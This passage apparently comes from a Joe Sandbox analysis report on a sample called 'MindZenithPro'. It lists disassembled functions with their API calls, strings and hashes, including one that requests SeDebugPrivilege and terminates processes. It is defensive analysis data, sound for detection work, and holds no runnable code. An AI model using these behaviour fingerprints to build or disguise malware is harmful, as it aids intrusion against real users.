                                    • CloseHandle.KERNEL32(00000000), ref: 0044AA4B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 1701285019-2896544425
                                    • Opcode ID: 7e599a5bc017b781860816caa704593ccd57bf953e39ed503fff872d1061c4cb
                                    • Instruction ID: fb08c6f644e0dd521cebe8833340c9e9457732ff8f4e844f5fd5e8812f52c67b
                                    • Opcode Fuzzy Hash: 7e599a5bc017b781860816caa704593ccd57bf953e39ed503fff872d1061c4cb
                                    • Instruction Fuzzy Hash: 9A61BF71208602AFE320DF19C485F16BBE0AF44308F18849DE4568FBA3C779ED46CB96
                                    Function 00454044 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004540E3
                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004540F8
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00454112
                                    • _wcslen.LIBCMT ref: 00454157
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00454184
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004541B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcslen
                                    • String ID: SysListView32
                                    • API String ID: 2147712094-78025650
                                    • Opcode ID: bc1c5d429ae31286c6064a91b9718fc07f4accca2003786b2769a11dfbb090f7
                                    • Instruction ID: 6370d3c5f77310cc86c8749ee83b6f72c5717c29a06ef5a674d925c7ddba477d
                                    • Opcode Fuzzy Hash: bc1c5d429ae31286c6064a91b9718fc07f4accca2003786b2769a11dfbb090f7
                                    • Instruction Fuzzy Hash: D041C271900318ABDB219F64CC49BEB7BA9EF48355F10052AFA04EB2C2D77599D8CB94
                                    Function 0042C35F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0042C3FE
                                    • IsMenu.USER32(00000000), ref: 0042C41E
                                    • CreatePopupMenu.USER32 ref: 0042C454
                                    • GetMenuItemCount.USER32(00D652F8), ref: 0042C4A5
                                    • InsertMenuItemW.USER32(00D652F8,?,00000001,00000030), ref: 0042C4CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                    • String ID: 0$2
                                    • API String ID: 93392585-3793063076
                                    • Opcode ID: a2eca7e4d852557e7f52144f4031e4fb364ef8bb71612354ba69ec5ef1a11468
                                    • Instruction ID: fafe3437db1f41cb4c7ac1ff93ea44742a3110ca1e63dba73eede5bcd29db97b
                                    • Opcode Fuzzy Hash: a2eca7e4d852557e7f52144f4031e4fb364ef8bb71612354ba69ec5ef1a11468
                                    • Instruction Fuzzy Hash: 9951AF70B00225ABDB20EF68E9D4BBFBBF4AF44318F54421AE405D7291D3789941CB29
                                    Function 003E3070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 003E309B
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003E30A3
                                    • _ValidateLocalCookies.LIBCMT ref: 003E3131
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003E315C
                                    • _ValidateLocalCookies.LIBCMT ref: 003E31B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm$vK>
                                    • API String ID: 1170836740-7962986
                                    • Opcode ID: a0aee60e1e74b55f4630eac9caec9114b4db0562db7d575c73ca6d4a006041e6
                                    • Instruction ID: 7d3fc39d114ef60f1a7e121cf5e9e44aafffda49213cb7e5c783ad120382efde
                                    • Opcode Fuzzy Hash: a0aee60e1e74b55f4630eac9caec9114b4db0562db7d575c73ca6d4a006041e6
                                    • Instruction Fuzzy Hash: 2341D630E002A89BCF11EF6AC849A9EBBF5AF44314F158259E8156B3D2D731DF01CB91
                                    Function 0042E468 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 642191829-3771769585
                                    • Opcode ID: c232e325ce15f52dca4abe93853437f2fbc8b20a7c81166939e3eda384bf6ef7
                                    • Instruction ID: 1edda099a2bb0eb2e6cb2c98d22ae89e66d88ff5a9b243d234a42f519524a892
                                    • Opcode Fuzzy Hash: c232e325ce15f52dca4abe93853437f2fbc8b20a7c81166939e3eda384bf6ef7
                                    • Instruction Fuzzy Hash: B511E731A00224BBCB257BA2AC0AEEF776CDF05715F50017AF545970D2EF78DA818A69
                                    Function 0045A672 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • GetSystemMetrics.USER32(0000000F), ref: 0045A6B3
                                    • GetSystemMetrics.USER32(0000000F), ref: 0045A6D3
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0045A910
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0045A92E
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0045A94F
                                    • ShowWindow.USER32(00000003,00000000), ref: 0045A96E
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0045A993
                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0045A9B6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                    • String ID:
                                    • API String ID: 1211466189-0
                                    • Opcode ID: 3bf4f1e3c3d89a3b4a72c7989f7cbc183d1d0cd0e39e69e1146868a81fbe4e3d
                                    • Instruction ID: b5906ad96a9e95f5a37ff880f09d4ee3bedf8fb0ede77a57fa7cc472a0079f6d
                                    • Opcode Fuzzy Hash: 3bf4f1e3c3d89a3b4a72c7989f7cbc183d1d0cd0e39e69e1146868a81fbe4e3d
                                    • Instruction Fuzzy Hash: 57B1D070600219EFCF14CF28C9847AE7BF1FF44302F09816AED459B296D738A958CB66
                                    Function 0042F35A Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$LocalTime
                                    • String ID:
                                    • API String ID: 952045576-0
                                    • Opcode ID: 60a85832d94243e42c7ba0cd9fbf9382b6367774fdf97b81ddaaff4b644037cd
                                    • Instruction ID: 3dfa0259756370fb150d77650c0646fbb2d41f889801176c73a4307536962b5f
                                    • Opcode Fuzzy Hash: 60a85832d94243e42c7ba0cd9fbf9382b6367774fdf97b81ddaaff4b644037cd
                                    • Instruction Fuzzy Hash: 5841E465D1016475CB02FBF5C84A9CFB7B89F05300F908A32E608E7161FB78E215C3A9
                                    Function 003DF596 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00402A40,00000004,00000000,00000000), ref: 003DF611
                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00402A40,00000004,00000000,00000000), ref: 0041F980
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00402A40,00000004,00000000,00000000), ref: 0041FA03
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 1b02512abf218d7ba204b6abc3eb572985a54e91b6550b79e8d2542815a551bb
                                    • Instruction ID: b0fc1a81c57b84b053935925d7aedb1f85e9b04f18bdd6b3bd347da06335fbc2
                                    • Opcode Fuzzy Hash: 1b02512abf218d7ba204b6abc3eb572985a54e91b6550b79e8d2542815a551bb
                                    • Instruction Fuzzy Hash: A2413BB2A05780AEC7379B39A8C876A7B95AF56304F15443FE04746F71C638E885CB19
                                    Function 004534C1 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 004534D9
                                    • GetDC.USER32(00000000), ref: 004534E1
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004534EC
                                    • ReleaseDC.USER32(00000000,00000000), ref: 004534F8
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00453534
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00453545
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00456225,?,?,000000FF,00000000,?,000000FF,?), ref: 00453580
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0045359F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 61bc1d6d2f68f3acf60ff2ad8ab44b6396f7dec587e7a3fa46ab8a9a713f98fc
                                    • Instruction ID: f7c9bd7b5108b927658e78d2548e7b73928a9e3889d05f3ce7d41f4c8b21fe84
                                    • Opcode Fuzzy Hash: 61bc1d6d2f68f3acf60ff2ad8ab44b6396f7dec587e7a3fa46ab8a9a713f98fc
                                    • Instruction Fuzzy Hash: 7031AE72201214BFEB218F50CC89FEB3BADEF49752F044065FE089A292D6759D41CBA8
                                    Function 00445735 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 6be36831620077eb3bb9945d8c2c0a7ae2f33edb45dd00698c8dd888b5950ca3
                                    • Instruction ID: b3e2d4d81a6ec5bc8998e836013fbcdd727bbca1146ebba703949e15a4a4a241
                                    • Opcode Fuzzy Hash: 6be36831620077eb3bb9945d8c2c0a7ae2f33edb45dd00698c8dd888b5950ca3
                                    • Instruction Fuzzy Hash: 23D1D171A0060A9FEF10DF98C881BAEB7B5FF48314F14816AE915AB382E774ED45CB54
                                    Function 00401872 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00401B4B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0040191E
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00401B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 004019A1
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401B4B,?,00401B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00401A34
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00401B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00401A4B
                                      • Part of subcall function 003F3B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E0145,?,?,00430F03,0000FFFF), ref: 003F3BA2
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00401B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00401AC7
                                    • __freea.LIBCMT ref: 00401AF2
                                    • __freea.LIBCMT ref: 00401AFE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 2829977744-0
                                    • Opcode ID: 3006bdaabdc559d4fab3b7479ab264fd7a6c1f82e991eac41306715b1c29db58
                                    • Instruction ID: ed270d9df16e6a7d48f58f565467d573eb2f83a1ad1d8931b6c64815b6e8d342
                                    • Opcode Fuzzy Hash: 3006bdaabdc559d4fab3b7479ab264fd7a6c1f82e991eac41306715b1c29db58
                                    • Instruction Fuzzy Hash: 8891C272F012169EDB219AA4C891AEF7BB5AF49310F14423AE805F72E1D738DD41CB69
                                    Function 00444CAA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2610073882-625585964
                                    • Opcode ID: 6fe29614a265a361986568747bb3bcbef2f4e5aeb643e980d683526ab3af7a68
                                    • Instruction ID: 58cfce73e298f1d3b466fab94e9613931c3ecc19fe1344f1be3e3e3529c9217f
                                    • Opcode Fuzzy Hash: 6fe29614a265a361986568747bb3bcbef2f4e5aeb643e980d683526ab3af7a68
                                    • Instruction Fuzzy Hash: 84919071A00215ABEF20CFA5C848FAFBBB8FF85714F10855AF515AB280D7789945CF68
                                    Function 003D96C0 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 988698afc1920a2c00996efec4c93928f9476f2d882fc1f5455a70c35a45bece
                                    • Instruction ID: 9d564dd8d422b21668d0851ee2ec998dc45f6b33a9ee2664083dff4fa657c253
                                    • Opcode Fuzzy Hash: 988698afc1920a2c00996efec4c93928f9476f2d882fc1f5455a70c35a45bece
                                    • Instruction Fuzzy Hash: 5F913972D00219AFCB11CFA9CC84AEEBBB9FF49320F148556E515B7351D378A981CB64
                                    Function 00431870 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00431945
                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 0043196D
                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00431991
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004319C1
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00431A48
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00431AAD
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00431B19
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                    • String ID:
                                    • API String ID: 2550207440-0
                                    • Opcode ID: 20a1c90c26bb5909d2a8a657d15def3469a5d54865b99ecc51bc7e5927fa256c
                                    • Instruction ID: ea43c9ac35a730128b9abe2e1164e88cacdb69a0e073b04c6a9ac415e8b42968
                                    • Opcode Fuzzy Hash: 20a1c90c26bb5909d2a8a657d15def3469a5d54865b99ecc51bc7e5927fa256c
                                    • Instruction Fuzzy Hash: EE91F475A002189FEB01DF98C885BBEB7B4FF09315F14502AE911EB2A1D778E941CB98
                                    Function 004440CE Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 004440F2
                                    • CharUpperBuffW.USER32(?,?), ref: 00444201
                                    • _wcslen.LIBCMT ref: 00444211
                                    • VariantClear.OLEAUT32(?), ref: 004443A6
                                      • Part of subcall function 004313C8: VariantInit.OLEAUT32(00000000), ref: 00431408
                                      • Part of subcall function 004313C8: VariantCopy.OLEAUT32(?,?), ref: 00431411
                                      • Part of subcall function 004313C8: VariantClear.OLEAUT32(?), ref: 0043141D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4137639002-1221869570
                                    • Opcode ID: 8a2199f5429a8fc8a17e9c916e7578748cd1b370f1841fdc9fb3a3ec3ca1e230
                                    • Instruction ID: 29e464b80ea1a6af5e8d5ad830f143d5548a311ec9702e4eda7877764d2e4a78
                                    • Opcode Fuzzy Hash: 8a2199f5429a8fc8a17e9c916e7578748cd1b370f1841fdc9fb3a3ec3ca1e230
                                    • Instruction Fuzzy Hash: 56915675A083019FD700EF64C484A2AB7E5FF88714F14896EF89A9B351DB34ED46CB86
                                    Function 00445334 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00420695: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?,?,004209E5), ref: 004206B2
                                      • Part of subcall function 00420695: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?), ref: 004206CD
                                      • Part of subcall function 00420695: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?), ref: 004206DB
                                      • Part of subcall function 00420695: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?), ref: 004206EB
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004453D8
                                    • _wcslen.LIBCMT ref: 004454E0
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00445556
                                    • CoTaskMemFree.OLE32(?), ref: 00445561
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
